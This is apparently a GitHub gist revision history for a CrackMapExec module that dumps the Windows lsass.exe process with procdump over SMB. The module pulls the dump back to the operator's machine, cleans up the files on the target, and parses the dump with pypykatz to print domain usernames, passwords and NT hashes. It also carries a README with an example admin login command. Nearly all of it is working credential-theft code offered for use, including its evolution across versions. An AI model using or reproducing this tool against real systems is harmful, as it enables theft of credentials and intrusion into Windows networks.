caketi · November 26, 2019 08:04 · Nov 17, 2019 · Nov 17, 2019 · Nov 17, 2019 · Nov 16, 2019
diff --git a/areadme.md b/areadme.md
@@ -1,4 +1,4 @@
-1. install pypykatz `pip install pypykatz`
+1. install pypykatz `pip install pypykatz` outisde your pipenv
 2. Add this file to `cme/module/procdump.py`
 3. compile `python setup.py install`
 4. run `cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump`

diff --git a/areadme.md b/areadme.md
@@ -3,4 +3,4 @@
 3. compile `python setup.py install`
 4. run `cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump`
 
-![image](https://user-images.githubusercontent.com/5891788/68993361-8133af80-0877-11ea-960f-091e8be9a8c2.png)
+![image](https://user-images.githubusercontent.com/5891788/69007484-96274600-093e-11ea-9f8a-34997f198f82.png)
diff --git a/procdump.py b/procdump.py
@@ -1,14 +1,13 @@
 # prdocdump module for CME python2
 # author: github.com/mpgn
-# thanks to 
-# v0.3
+# thanks to pixis (@HackAndDo) for making it pretty l33t :)
+# v0.4
 
 from StringIO import StringIO
 import os
 import sys
 import re
 import time
-from subprocess import call
 
 class CMEModule:
 
@@ -100,11 +99,13 @@ def on_admin_login(self, context, connection):
                 context.log.info("Extracted credentials:")
                 with open(self.procdump_path + machine_name + ".txt", 'r') as outfile:
                     data = outfile.read()
-                    regex = r"(username:? (?!NA).+[^\$])\n.*\n.*(password:? (?!None).+)|(Username: (?!NA).+[^\$]\n.*\n.*\n.*\n.*SHA1: .*)"
+                    regex = r"(?:username:? (?!NA)(?P<username>.+[^\$])\n.*domain(?:name)?:? (?P<domain>.+)\n)(?:.*password:? (?!None)(?P<password>.+)|.*\n.*NT: (?P<hash>.*))"
                     matches = re.finditer(regex, data, re.MULTILINE | re.IGNORECASE)
-                    for matchNum, match in enumerate(matches, start=1):
-                        print("===")
-                        print ("{match}".format(match = match.group()).replace("\t", ""))
+                    for match in matches:
+                        domain = match.group("domain")
+                        username = match.group("username")
+                        password = match.group("password") or match.group("hash")
+                        context.log.success(highlight(domain + "\\" + username + ":" + password))
             except Exception as e:
                 context.log.error('Error while execute pypykatz: {}'.format(e))
                 context.log.error('Please make sure pypykatz is installed (pip3 install pypykatz)')
diff --git a/procdump.py b/procdump.py
@@ -6,7 +6,6 @@
 from StringIO import StringIO
 import os
 import sys
-import shlex
 import re
 import time
 from subprocess import call

diff --git a/procdump.py b/procdump.py
@@ -1,5 +1,6 @@
 # prdocdump module for CME python2
 # author: github.com/mpgn
+# thanks to 
 # v0.3
 
 from StringIO import StringIO
@@ -50,12 +51,7 @@ def on_admin_login(self, context, connection):
             except Exception as e:
               context.log.error('Error writing file to share {}: {}'.format(share, e))
 
-        # get pid lsass
-        command = 'tasklist /v /fo csv | findstr /i "lsass"'
-        context.log.info('Getting lsass PID {}'.format(command))
-        p = connection.execute(command, True)
-        pid = p.split(',')[1][1:-1]
-        command = self.tmp_dir + self.procdump + ' -accepteula -ma ' + pid + ' ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'
+        command = self.tmp_dir + self.procdump + ' -accepteula -ma lsass.exe ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'
         context.log.info('Executing command {}'.format(command))
         p = connection.execute(command, True)
         context.log.debug(p)

diff --git a/procdump.py b/procdump.py
@@ -1,6 +1,6 @@
 # prdocdump module for CME python2
 # author: github.com/mpgn
-# v0.2
+# v0.3
 
 from StringIO import StringIO
 import os
@@ -48,10 +48,14 @@ def on_admin_login(self, context, connection):
                 connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
                 context.log.success('Created file {} on the \\\\{}{}'.format(self.procdump, self.share, self.tmp_share))
             except Exception as e:
-              context.log.error('Error writing file to share {}: {}'.format(self.share, e))
+              context.log.error('Error writing file to share {}: {}'.format(share, e))
 
-
-        command = self.tmp_dir + self.procdump + ' -accepteula -ma lsass.exe ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'
+        # get pid lsass
+        command = 'tasklist /v /fo csv | findstr /i "lsass"'
+        context.log.info('Getting lsass PID {}'.format(command))
+        p = connection.execute(command, True)
+        pid = p.split(',')[1][1:-1]
+        command = self.tmp_dir + self.procdump + ' -accepteula -ma ' + pid + ' ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'
         context.log.info('Executing command {}'.format(command))
         p = connection.execute(command, True)
         context.log.debug(p)
@@ -68,30 +72,33 @@ def on_admin_login(self, context, connection):
             machine_name = ''
             if matches:
                 machine_name = matches.group()
-                context.log.info('Copy {} to host'.format(machine_name))
-                with open(self.procdump_path + machine_name, 'w+') as dump_file:
-                    try:
-                        connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
-                        context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
-                    except Exception as e:
-                        context.log.error('Error while get file: {}'.format(e))
             else:
                 context.log.info("Error getting the lsass.dmp file name")
                 sys.exit(1)
 
+            context.log.info('Copy {} to host'.format(machine_name))
+
+            with open(self.procdump_path + machine_name, 'w+') as dump_file:
+                try:
+                    connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
+                    context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
+                except Exception as e:
+                    context.log.error('Error while get file: {}'.format(e))
+
             try:
                 connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
                 context.log.success('Deleted procdump file on the {} share'.format(self.share))
             except Exception as e:
                 context.log.error('Error deleting procdump file on share {}: {}'.format(self.share, e))
-
+            
             try:
                 connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
                 context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
             except Exception as e:
                 context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
-
+            
             context.log.info("pypykatz lsa minidump {} > {}.txt".format(self.procdump_path + machine_name, self.procdump_path + machine_name))
+
             try:
                 context.log.info('Invoke pypykatz in order to extract the credentials ...')
                 os.system("pypykatz lsa minidump " + self.procdump_path + machine_name + " > " + self.procdump_path + machine_name + ".txt")

diff --git a/procdump.py b/procdump.py
@@ -62,35 +62,35 @@ def on_admin_login(self, context, connection):
         else:
             context.log.error('Process lsass.exe error un dump, try with verbose')
 
-        regex = r"([A-Za-z0-9-]*.dmp)"
-        matches = re.search(regex, str(p), re.MULTILINE)
-        machine_name = ''
-        if matches:
-            machine_name = matches.group()
-            context.log.info('Copy {} to host'.format(machine_name))
-            with open(self.procdump_path + machine_name, 'w+') as dump_file:
-                try:
-                    connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
-                    context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
-                except Exception as e:
-                    context.log.error('Error while get file: {}'.format(e))
-        else:
-            context.log.info("Error getting the lsass.dmp file name")
-            sys.exit(1)
+        if dump:
+            regex = r"([A-Za-z0-9-]*.dmp)"
+            matches = re.search(regex, str(p), re.MULTILINE)
+            machine_name = ''
+            if matches:
+                machine_name = matches.group()
+                context.log.info('Copy {} to host'.format(machine_name))
+                with open(self.procdump_path + machine_name, 'w+') as dump_file:
+                    try:
+                        connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
+                        context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
+                    except Exception as e:
+                        context.log.error('Error while get file: {}'.format(e))
+            else:
+                context.log.info("Error getting the lsass.dmp file name")
+                sys.exit(1)
 
-        try:
-            connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
-            context.log.success('Deleted procdump file on the {} share'.format(self.share))
-        except Exception as e:
-            context.log.error('Error deleting procdump file on share {}: {}'.format(self.share, e))
+            try:
+                connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
+                context.log.success('Deleted procdump file on the {} share'.format(self.share))
+            except Exception as e:
+                context.log.error('Error deleting procdump file on share {}: {}'.format(self.share, e))
 
-        try:
-            connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
-            context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
-        except Exception as e:
-            context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
+            try:
+                connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
+                context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
+            except Exception as e:
+                context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
 
-        if dump:
             context.log.info("pypykatz lsa minidump {} > {}.txt".format(self.procdump_path + machine_name, self.procdump_path + machine_name))
             try:
                 context.log.info('Invoke pypykatz in order to extract the credentials ...')

diff --git a/procdump.py b/procdump.py
@@ -105,4 +105,4 @@ def on_admin_login(self, context, connection):
                         print ("{match}".format(match = match.group()).replace("\t", ""))
             except Exception as e:
                 context.log.error('Error while execute pypykatz: {}'.format(e))
-                context.log.error('Please make sure pypykatz is installed (pip install pypykatz)')
+                context.log.error('Please make sure pypykatz is installed (pip3 install pypykatz)')
diff --git a/procdump.py b/procdump.py
@@ -56,17 +56,11 @@ def on_admin_login(self, context, connection):
         p = connection.execute(command, True)
         context.log.debug(p)
         dump = False
-        while True:
-            if 'Dump 1 complete' in p:
-                context.log.success('Process lsass.exe was successfully dumped')
-                dump = True
-                break
-            elif 'Dump 1 initiated' in p:
-                context.log.info('Waiting process lsass.exe to be fully dumped')
-                time.sleep(2)
-            else:
-                context.log.error('Process lsass.exe error un dump, try with verbose')
-                break
+        if 'Dump 1 complete' in p:
+            context.log.success('Process lsass.exe was successfully dumped')
+            dump = True
+        else:
+            context.log.error('Process lsass.exe error un dump, try with verbose')
 
         regex = r"([A-Za-z0-9-]*.dmp)"
         matches = re.search(regex, str(p), re.MULTILINE)

diff --git a/procdump.py b/procdump.py
@@ -48,7 +48,7 @@ def on_admin_login(self, context, connection):
                 connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
                 context.log.success('Created file {} on the \\\\{}{}'.format(self.procdump, self.share, self.tmp_share))
             except Exception as e:
-              context.log.error('Error writing file to share {}: {}'.format(share, e))
+              context.log.error('Error writing file to share {}: {}'.format(self.share, e))
 
 
         command = self.tmp_dir + self.procdump + ' -accepteula -ma lsass.exe ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'

diff --git a/procdump.py b/procdump.py
@@ -1,10 +1,6 @@
-# procdump module for CME python2
-# author: github.com/mpgn
-# v0.1
-
 # prdocdump module for CME python2
 # author: github.com/mpgn
-# v0.1
+# v0.2
 
 from StringIO import StringIO
 import os

diff --git a/procdump.py b/procdump.py
@@ -2,6 +2,10 @@
 # author: github.com/mpgn
 # v0.1
 
+# prdocdump module for CME python2
+# author: github.com/mpgn
+# v0.1
+
 from StringIO import StringIO
 import os
 import sys
@@ -56,44 +60,48 @@ def on_admin_login(self, context, connection):
         p = connection.execute(command, True)
         context.log.debug(p)
         dump = False
-        if 'Dump 1 complete' in p:
-            context.log.success('Process lsass.exe was successfully dumped')
-            dump = True
-        else:
-            context.log.error('Process lsass.exe error un dump, try with verbose')
+        while True:
+            if 'Dump 1 complete' in p:
+                context.log.success('Process lsass.exe was successfully dumped')
+                dump = True
+                break
+            elif 'Dump 1 initiated' in p:
+                context.log.info('Waiting process lsass.exe to be fully dumped')
+                time.sleep(2)
+            else:
+                context.log.error('Process lsass.exe error un dump, try with verbose')
+                break
 
         regex = r"([A-Za-z0-9-]*.dmp)"
         matches = re.search(regex, str(p), re.MULTILINE)
         machine_name = ''
         if matches:
             machine_name = matches.group()
+            context.log.info('Copy {} to host'.format(machine_name))
+            with open(self.procdump_path + machine_name, 'w+') as dump_file:
+                try:
+                    connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
+                    context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
+                except Exception as e:
+                    context.log.error('Error while get file: {}'.format(e))
         else:
             context.log.info("Error getting the lsass.dmp file name")
             sys.exit(1)
 
-        context.log.info('Copy {} to host'.format(machine_name))
-
-        with open(self.procdump_path + machine_name, 'w+') as dump_file:
-            try:
-                connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
-                context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
-            except Exception as e:
-                context.log.error('Error while get file: {}'.format(e))
-
         try:
             connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
             context.log.success('Deleted procdump file on the {} share'.format(self.share))
         except Exception as e:
             context.log.error('Error deleting procdump file on share {}: {}'.format(self.share, e))
-        
+
         try:
             connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
             context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
         except Exception as e:
             context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
-
-        context.log.info("pypykatz lsa minidump {} > {}.txt".format(self.procdump_path + machine_name, self.procdump_path + machine_name))
+
         if dump:
+            context.log.info("pypykatz lsa minidump {} > {}.txt".format(self.procdump_path + machine_name, self.procdump_path + machine_name))
             try:
                 context.log.info('Invoke pypykatz in order to extract the credentials ...')
                 os.system("pypykatz lsa minidump " + self.procdump_path + machine_name + " > " + self.procdump_path + machine_name + ".txt")

diff --git a/procdump.py b/procdump.py
@@ -1,4 +1,4 @@
-# prdocdump module for CME python2
+# procdump module for CME python2
 # author: github.com/mpgn
 # v0.1
 

diff --git a/areadme.md b/areadme.md
@@ -1,6 +1,6 @@
-install pypykatz `pip install pypykatz`
-Add this file to `cme/module/procdump.py`
-compile `python setup.py install`
-run `cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump`
+1. install pypykatz `pip install pypykatz`
+2. Add this file to `cme/module/procdump.py`
+3. compile `python setup.py install`
+4. run `cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump`
 
 ![image](https://user-images.githubusercontent.com/5891788/68993361-8133af80-0877-11ea-960f-091e8be9a8c2.png)
diff --git a/readme.me → areadme.md b/readme.me → areadme.md
diff --git a/gistfile1.txt → readme.me b/gistfile1.txt → readme.me
diff --git a/gistfile1.txt b/gistfile1.txt
@@ -0,0 +1,6 @@
+install pypykatz `pip install pypykatz`
+Add this file to `cme/module/procdump.py`
+compile `python setup.py install`
+run `cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump`
+
+![image](https://user-images.githubusercontent.com/5891788/68993361-8133af80-0877-11ea-960f-091e8be9a8c2.png)
diff --git a/procdump.py b/procdump.py
@@ -0,0 +1,110 @@
+# prdocdump module for CME python2
+# author: github.com/mpgn
+# v0.1
+
+from StringIO import StringIO
+import os
+import sys
+import shlex
+import re
+import time
+from subprocess import call
+
+class CMEModule:
+
+    name = 'procdump'
+    description = "Get lsass dump using procdump64 and parse the result with pypykatz"
+    supported_protocols = ['smb']
+    opsec_safe = True # not really
+    multiple_hosts = True
+
+    def options(self, context, module_options):
+        '''
+            TMP_DIR             Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
+            PROCDUMP_PATH       Path where procdump.exe is on your system (default: /tmp/shared/)
+            PROCDUMP_EXE_NAME   Name of the procdump executable (default: procdump64.exe)
+        '''
+
+        self.tmp_dir = "C:\\Windows\\Temp\\"
+        self.share = "C$"
+        self.tmp_share = self.tmp_dir.split(":")[1]
+        self.procdump = "procdump64.exe"
+        self.procdump_path = "/tmp/shared/"
+
+        if 'PROCDUMP_PATH' in module_options:
+            self.procdump_path = module_options['PROCDUMP_PATH']
+
+        if 'PROCDUMP_EXE_NAME' in module_options:
+            self.procdump = module_options['PROCDUMP_EXE_NAME']
+
+        if 'TMP_DIR' in module_options:
+            self.tmp_dir = module_options['TMP_DIR']
+
+    def on_admin_login(self, context, connection):
+
+        context.log.info('Copy {} to {}'.format(self.procdump_path + self.procdump, self.tmp_dir))
+        with open(self.procdump_path + self.procdump, 'rb') as procdump:
+            try:
+                connection.conn.putFile(self.share, self.tmp_share + self.procdump, procdump.read)
+                context.log.success('Created file {} on the \\\\{}{}'.format(self.procdump, self.share, self.tmp_share))
+            except Exception as e:
+              context.log.error('Error writing file to share {}: {}'.format(share, e))
+
+
+        command = self.tmp_dir + self.procdump + ' -accepteula -ma lsass.exe ' + self.tmp_dir + '%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.dmp'
+        context.log.info('Executing command {}'.format(command))
+        p = connection.execute(command, True)
+        context.log.debug(p)
+        dump = False
+        if 'Dump 1 complete' in p:
+            context.log.success('Process lsass.exe was successfully dumped')
+            dump = True
+        else:
+            context.log.error('Process lsass.exe error un dump, try with verbose')
+
+        regex = r"([A-Za-z0-9-]*.dmp)"
+        matches = re.search(regex, str(p), re.MULTILINE)
+        machine_name = ''
+        if matches:
+            machine_name = matches.group()
+        else:
+            context.log.info("Error getting the lsass.dmp file name")
+            sys.exit(1)
+
+        context.log.info('Copy {} to host'.format(machine_name))
+
+        with open(self.procdump_path + machine_name, 'w+') as dump_file:
+            try:
+                connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write)
+                context.log.success('Dumpfile of lsass.exe was transferred to {}'.format(self.procdump_path + machine_name))
+            except Exception as e:
+                context.log.error('Error while get file: {}'.format(e))
+
+        try:
+            connection.conn.deleteFile(self.share, self.tmp_share + self.procdump)
+            context.log.success('Deleted procdump file on the {} share'.format(self.share))
+        except Exception as e:
+            context.log.error('Error deleting procdump file on share {}: {}'.format(self.share, e))
+
+        try:
+            connection.conn.deleteFile(self.share, self.tmp_share + machine_name)
+            context.log.success('Deleted lsass.dmp file on the {} share'.format(self.share))
+        except Exception as e:
+            context.log.error('Error deleting lsass.dmp file on share {}: {}'.format(self.share, e))
+
+        context.log.info("pypykatz lsa minidump {} > {}.txt".format(self.procdump_path + machine_name, self.procdump_path + machine_name))
+        if dump:
+            try:
+                context.log.info('Invoke pypykatz in order to extract the credentials ...')
+                os.system("pypykatz lsa minidump " + self.procdump_path + machine_name + " > " + self.procdump_path + machine_name + ".txt")
+                context.log.info("Extracted credentials:")
+                with open(self.procdump_path + machine_name + ".txt", 'r') as outfile:
+                    data = outfile.read()
+                    regex = r"(username:? (?!NA).+[^\$])\n.*\n.*(password:? (?!None).+)|(Username: (?!NA).+[^\$]\n.*\n.*\n.*\n.*SHA1: .*)"
+                    matches = re.finditer(regex, data, re.MULTILINE | re.IGNORECASE)
+                    for matchNum, match in enumerate(matches, start=1):
+                        print("===")
+                        print ("{match}".format(match = match.group()).replace("\t", ""))
+            except Exception as e:
+                context.log.error('Error while execute pypykatz: {}'.format(e))
+                context.log.error('Please make sure pypykatz is installed (pip install pypykatz)')
No results found